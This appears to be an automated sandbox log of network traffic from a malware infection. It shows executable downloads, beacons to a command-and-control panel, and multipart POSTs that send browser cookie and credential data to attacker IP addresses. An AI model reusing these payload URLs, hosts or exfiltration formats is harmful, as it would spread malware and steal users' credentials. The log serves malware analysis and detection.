Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:12:09 GMTContent-Type: application/octet-streamContent-Length: 4489216Last-Modified: Thu, 19 Dec 2024 08:05:35 GMTConnection: keep-aliveETag: "6763d3cf-448000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e0 55 60 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 3e 44 00 00 2e 64 00 00 32 00 00 00 c0 b6 00 00 10 00 00 00 50 44 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 b6 00 00 04 00 00 db 60 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 61 00 73 00 00 00 00 80 61 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c a1 b6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc a0 b6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 61 00 00 10 00 00 00 3e 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 80 61 00 00 02 00 00 00 4e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 61 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 39 00 00 a0 61 00 00 02 00 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 62 66 79 6c 78 6a 73 00 10 1c 00 00 a0 9a 00 00 04 1c 00 00 54 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6b 76 72 78 6d 6e 6a 00 10 00 00 00 b0 b6 00 00 06 00 00 00 58 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 b6 00 00 22 00 00 00 5e 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:12:48 GMTContent-Type: application/octet-streamContent-Length: 1716736Last-Modified: Thu, 19 Dec 2024 08:26:07 GMTConnection: keep-aliveETag: "6763d89f-1a3200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 44 00 00 04 00 00 86 70 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 a0 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 69 75 76 75 72 73 66 00 e0 19 00 00 80 2a 00 00 d2 19 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 77 75 6a 77 65 75 76 00 20 00 00 00 60 44 00 00 04 00 00 00 0c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 44 00 00 22 00 00 00 10 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:12:55 GMTContent-Type: application/octet-streamContent-Length: 2928640Last-Modified: Thu, 19 Dec 2024 08:27:44 GMTConnection: keep-aliveETag: "6763d900-2cb000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 e0 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 50 00 00 04 00 00 52 61 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 61 73 73 71 6c 61 77 77 00 10 2b 00 00 c0 24 00 00 0e 2b 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 63 68 6c 6a 64 67 00 10 00 00 00 d0 4f 00 00 04 00 00 00 8a 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4f 00 00 22 00 00 00 8e 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017477001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017478001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCAAAFCBFBAKFHJDBKJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 35 46 35 46 37 36 31 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="hwid"F255F5F7614C2817018708------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="build"stok------DGCAAAFCBFBAKFHJDBKJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="message"browsers------AECAECFCAAEBFHIEHDGH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="message"plugins------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="message"fplugins------IDBKKKKKFBGDGDHIDBGH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFIIHost: 185.215.113.206Content-Length: 5291Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017479001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017480001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBKHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 2d 2d 0d 0a Data Ascii: ------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------EGHCAKKEGCAAFHJJJDBK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 33 61 31 65 63 37 36 30 36 32 63 66 31 34 39 31 35 61 61 36 65 61 64 39 63 62 32 37 30 36 30 36 38 62 65 38 66 31 37 62 33 63 37 62 35 38 30 34 66 62 65 39 35 38 61 32 66 31 65 64 32 35 62 32 62 32 62 38 30 34 66 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"83a1ec76062cf14915aa6ead9cb2706068be8f17b3c7b5804fbe958a2f1ed25b2b2b804f------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="file"------GCGHJEBGHJKEBFHIJDHC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 34 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017481001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/x3team/random.exe HTTP/1.1Host: 31.41.244.11
